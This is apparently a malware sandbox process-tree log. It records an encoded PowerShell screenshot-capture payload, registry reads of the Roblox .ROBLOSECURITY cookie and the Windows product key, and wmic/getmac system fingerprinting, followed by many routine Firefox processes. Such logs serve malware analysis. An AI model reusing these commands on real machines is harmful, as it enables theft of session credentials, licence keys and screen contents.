ZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="2⤵PID:2856
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=3⤵PID:3596
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4gmojml3\4gmojml3.cmdline"4⤵PID:6672
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES848B.tmp" "c:\Users\Admin\AppData\Local\Temp\4gmojml3\CSCED73A0C587B34949B2755D3EFE37FE92.TMP"5⤵PID:5652
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"2⤵PID:4968
-
C:\Windows\system32\tree.comtree /A /F3⤵PID:6948
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"2⤵PID:3340
-
C:\Windows\system32\tree.comtree /A /F3⤵PID:1352
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"2⤵PID:1340
-
C:\Windows\system32\tree.comtree /A /F3⤵PID:6432
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"2⤵PID:3784
-
C:\Windows\system32\tree.comtree /A /F3⤵PID:6280
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"2⤵PID:5940
-
C:\Windows\system32\tree.comtree /A /F3⤵PID:5076
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"2⤵PID:6932
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Command and Scripting Interpreter: PowerShell
PID:2528
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"2⤵PID:5036
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵PID:3756
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"2⤵PID:3228
-
C:\Windows\system32\getmac.exegetmac3⤵PID:2136
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"2⤵PID:5596
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption3⤵PID:5208
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"2⤵PID:6088
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory3⤵PID:6380
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"2⤵PID:3064
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid3⤵PID:188
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"2⤵PID:1516
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER3⤵
- Command and Scripting Interpreter: PowerShell
PID:992
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"2⤵PID:5148
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
PID:6048
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"2⤵PID:5856
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault3⤵PID:3896
-
-
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4467_none_7e0f83e07c8c1985\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4467_none_7e0f83e07c8c1985\TiWorker.exe -Embedding1⤵
- Drops file in Windows directory
PID:4668
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" a -i#7zMap20165:112:7zEvent18976 -ad -saa -- "C:\Users\Admin\Desktop\onefile_6488_133779369635176755"1⤵PID:1840
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"1⤵PID:4440
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵
- Checks processor information in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:5768 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1864 -parentBuildID 20240401114208 -prefsHandle 1796 -prefMapHandle 1788 -prefsLen 24531 -prefMapSize 245122 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2f61bd2c-da16-460b-9aa6-3f7e5ebcc7b6} 5768 "\\.\pipe\gecko-crash-server-pipe.5768" gpu3⤵PID:5924
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2268 -parentBuildID 20240401114208 -prefsHandle 2260 -prefMapHandle 2256 -prefsLen 24531 -prefMapSize 245122 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a91f606f-a021-4214-a50d-5f53e9471bc9} 5768 "\\.\pipe\gecko-crash-server-pipe.5768" socket3⤵PID:5680
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2676 -childID 1 -isForBrowser -prefsHandle 2160 -prefMapHandle 3372 -prefsLen 25030 -prefMapSize 245122 -jsInitHandle 1076 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3a119bd7-036f-4f1b-89c9-310da2038ee3} 5768 "\\.\pipe\gecko-crash-server-pipe.5768" tab3⤵PID:3096
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3696 -childID 2 -isForBrowser -prefsHandle 3208 -prefMapHandle 3320 -prefsLen 30263 -prefMapSize 245122 -jsInitHandle 1076 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {11013e6e-8fdd-4aa6-92f7-a7e913e88517} 5768 "\\.\pipe\gecko-crash-server-pipe.5768" tab3⤵PID:1756
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4588 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4616 -prefMapHandle 4604 -prefsLen 30317 -prefMapSize 245122 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8a4f6eda-4c5c-46da-a86a-cea85a831806} 5768 "\\.\pipe\gecko-crash-server-pipe.5768" utility3⤵
- Checks processor information in registry
PID:1136
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5204 -childID 3 -isForBrowser -prefsHandle 5132 -prefMapHandle 5244 -prefsLen 27782 -prefMapSize 245122 -jsInitHandle 1076 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c8dde70f-1f5b-48d5-9c82-c659377c9c38} 5768 "\\.\pipe\gecko-crash-server-pipe.5768" tab3⤵PID:7080
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5348 -childID 4 -isForBrowser -prefsHandle 5356 -prefMapHandle 5364 -prefsLen 27782 -prefMapSize 245122 -jsInitHandle 1076 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {50be3a8b-f8cf-4f6a-99d1-ef0a2d8a5114} 5768 "\\.\pipe\gecko-crash-server-pipe.5768" tab3⤵PID:6092
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5536 -childID 5 -isForBrowser -prefsHandle 5616 -prefMapHandle 5612 -prefsLen 27782 -prefMapSize 245122 -jsInitHandle 1076 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {74de9443-81dc-489e-a376-10193861eaf0} 5768 "\\.\pipe\gecko-crash-server-pipe.5768" tab3⤵PID:1108
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6112 -childID 6 -isForBrowser -prefsHandle 6120 -prefMapHandle 6116 -prefsLen 27782 -prefMapSize 245122 -jsInitHandle 1076 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0d5a9588-5e0b-4b52-a5f4-cbed8ea063ec} 5768 "\\.\pipe\gecko-crash-server-pipe.5768" tab3⤵PID:4508
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5148 -childID 7 -isForBrowser -prefsHandle 6040 -prefMapHandle 5228 -prefsLen 27782 -prefMapSize 245122 -jsInitHandle 1076 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {180f76b4-9379-44b9-8ba0-cfddc462e08d} 5768 "\\.\pipe\gecko-crash-server-pipe.5768" tab3⤵PID:1716
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3648 -childID 8 -isForBrowser -prefsHandle 4368 -prefMapHandle 4016 -prefsLen 27782 -prefMapSize 245122 -jsInitHandle 1076 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bddf0bee-8303-4f09-9f47-2eaf7c17da22} 5768 "\\.\pipe\gecko-crash-server-pipe.5768" tab3⤵PID:6632
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6336 -childID 9 -isForBrowser -prefsHandle 6552 -prefMapHandle 4032 -prefsLen 27782 -prefMapSize 245122 -jsInitHandle 1076 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f8bd03cb-da97-41cc-81f9-e2e104bd10bd} 5768 "\\.\pipe\gecko-crash-server-pipe.5768" tab3⤵PID:1116
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7328 -childID 10 -isForBrowser -prefsHandle 6156 -prefMapHandle 6336 -prefsLen 27782 -prefMapSize 245122 -jsInitHandle 1076 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3427612e-9ed1-430b-899b-cd9d2fc41942} 5768 "\\.\pipe\gecko-crash-server-pipe.5768" tab3⤵PID:5944
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5808 -childID 11 -isForBrowser -prefsHandle 6188 -prefMapHandle 5260 -prefsLen 27782 -prefMapSize 245122 -jsInitHandle 1076 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {406e911c-7e0e-424d-8d1b-0aaca34413d1} 5768 "\\.\pipe\gecko-crash-server-pipe.5768" tab3⤵PID:2824
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7780 -childID 12 -isForBrowser -prefsHandle 7992 -prefMapHandle 2652 -prefsLen 27782 -prefMapSize 245122 -jsInitHandle 1076 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {57ffef8e-7163-44f8-8742-e190d890d88b} 5768 "\\.\pipe\gecko-crash-server-pipe.5768" tab3⤵PID:6400
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7404 -childID 13 -isForBrowser -prefsHandle 6240 -prefMapHandle 7264 -prefsLen 27782 -prefMapSize 245122 -jsInitHandle 1076 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0d8dca62-6aec-45aa-a8c5-1f745718f84d} 5768 "\\.\pipe\gecko-crash-server-pipe.5768" tab3⤵PID:644
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7296 -childID 14 -isForBrowser -prefsHandle 5752 -prefMapHandle 6264 -prefsLen 27782 -prefMapSize 245122 -jsInitHandle 1076 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {83b04716-447d-4c52-9980-475e9de3966f} 5768 "\\.\pipe\gecko-crash-server-pipe.5768" tab3⤵PID:5092
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8020 -childID 15 -isForBrowser -prefsHandle 8012 -prefMapHandle 8024 -prefsLen 27782 -prefMapSize 245122 -jsInitHandle 1076 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {38975e84-5b6f-4513-92fd-8172dcfce705} 5768 "\\.\pipe\gecko-crash-server-pipe.5768" tab3⤵PID:5240
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8200 -childID 16 -isForBrowser -prefsHandle 8208 -prefMapHandle 8212 -prefsLen 27782 -prefMapSize 245122 -jsInitHandle 1076 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e10cec92-2aca-4ef5-81a1-dcf555b29f8f} 5768 "\\.\pipe\gecko-crash-server-pipe.5768" tab3⤵PID:1180
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8248 -childID 17 -isForBrowser -prefsHandle 8572 -prefMapHandle 8268 -prefsLen 27782 -prefMapSize 245122 -jsInitHandle 1076 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {63af5018-fed0-402b-a4b2-6e188da214b5} 5768 "\\.\pipe\gecko-crash-server-pipe.5768" tab3⤵PID:1364
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6032 -childID 18 -isForBrowser -prefsHandle 3548 -prefMapHandle 6164 -prefsLen 27782 -prefMapSize 245122 -jsInitHandle 1076 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {caa395c3-b7fd-4cb4-be54-2c2320388b04} 5768 "\\.\pipe\gecko-crash-server-pipe.5768" tab3⤵PID:5156
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8704 -childID 19 -isForBrowser -prefsHandle 8224 -prefMapHandle 8700 -prefsLen 27782 -prefMapSize 245122 -jsInitHandle 1076 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a42fe260-378f-4f25-8956-82a9b1cf00b2} 5768 "\\.\pipe\gecko-crash-server-pipe.5768" tab3⤵PID:732
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8780 -childID 20 -isForBrowser -prefsHandle 8720 -prefMapHandle 8728 -prefsLen 27782 -prefMapSize 245122 -jsInitHandle 1076 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {68ea0603-eab6-4174-8733-1a11f22589c4} 5768 "\\.\pipe\gecko-crash-server-pipe.5768" tab3⤵PID:5840
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8740 -childID 21 -isForBrowser -prefsHandle 6156 -prefMapHandle 8660 -prefsLen 27782 -prefMapSize 245122 -jsInitHandle 1076 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3b1d50d6-8277-46b2-98c8-41d575d6afea} 5768 "\\.\pipe\gecko-crash-server-pipe.5768" tab3⤵PID:1424
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9080 -childID 22 -isForBrowser -prefsHandle 8996 -prefMapHandle 9000 -prefsLen 27782 -prefMapSize 245122 -jsInitHandle 1076 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bc9f8375-bafb-4f0a-901d-ca31f3db5991} 5768 "\\.\pipe\gecko-crash-server-pipe.5768" tab3⤵PID:3388
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9612 -childID 23 -isForBrowser -prefsHandle 9604 -prefMapHandle 9600 -prefsLen 27782 -prefMapSize 245122 -jsInitHandle 1076 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2b9758f0-122d-447f-98df-67b58f38ab7e} 5768 "\\.\pipe\gecko-crash-server-pipe.5768" tab3⤵PID:3504
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6264 -childID 24 -isForBrowser -prefsHandle 6048 -prefMapHandle 5076 -prefsLen 27782 -prefMapSize 245122 -jsInitHandle 1076 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {045aae8d-793f-4285-8fa0-e9aaba27c98a} 5768 "\\.\pipe\gecko-crash-server-pipe.5768" tab3⤵PID:5632
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5800 -childID 25 -isForBrowser -prefsHandle 7520 -prefMapHandle 4028 -prefsLen 27782 -prefMapSize 245122 -jsInitHandle 1076 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {398e3347-2a83-45da-953f-193633869bf5} 5768 "\\.\pipe\gecko-crash-server-pipe.5768" tab3⤵PID:2104
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5028 -childID 26 -isForBrowser -prefsHandle 8712 -prefMapHandle 3932 -prefsLen 27782 -prefMapSize 245122 -jsInitHandle 1076 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9b8f3c17-8934-45b9-9991-8bfe9af3f034} 5768 "\\.\pipe\gecko-crash-server-pipe.5768" tab3⤵PID:4944
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9856 -childID 27 -isForBrowser -prefsHandle 9864 -prefMapHandle 9760 -prefsLen 27782 -prefMapSize 245122 -jsInitHandle 1076 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8d1ff7be-e75a-44da-999c-154a9d9a7bec} 5768 "\\.\pipe\gecko-crash-server-pipe.5768" tab3⤵PID:6868
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9940 -childID 28 -isForBrowser -prefsHandle 3932 -prefMapHandle 8712 -prefsLen 27782 -prefMapSize 245122 -jsInitHandle 1076 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1f386b02-ecf6-4fcb-a94b-740b077d7ad6} 5768 "\\.\pipe\gecko-crash-server-pipe.5768" tab3⤵PID:224
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5028 -childID 29 -isForBrowser -prefsHandle 9056 -prefMapHandle 8640 -prefsLen 27782 -prefMapSize 245122 -jsInitHandle 1076 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {027e97d7-0eae-46f5-9df0-939dfc7955b0} 5768 "\\.\pipe\gecko-crash-server-pipe.5768" tab3⤵PID:3120
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9884 -childID 30 -isForBrowser -prefsHandle 9896 -prefMapHandle 9852 -prefsLen 30653 -prefMapSize 245122 -jsInitHandle 1076 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {652dd5de-f94f-484f-95f3-18fd2ce96da1} 5768 "\\.\pipe\gecko-crash-server-pipe.5768" tab3⤵PID:656
-
-
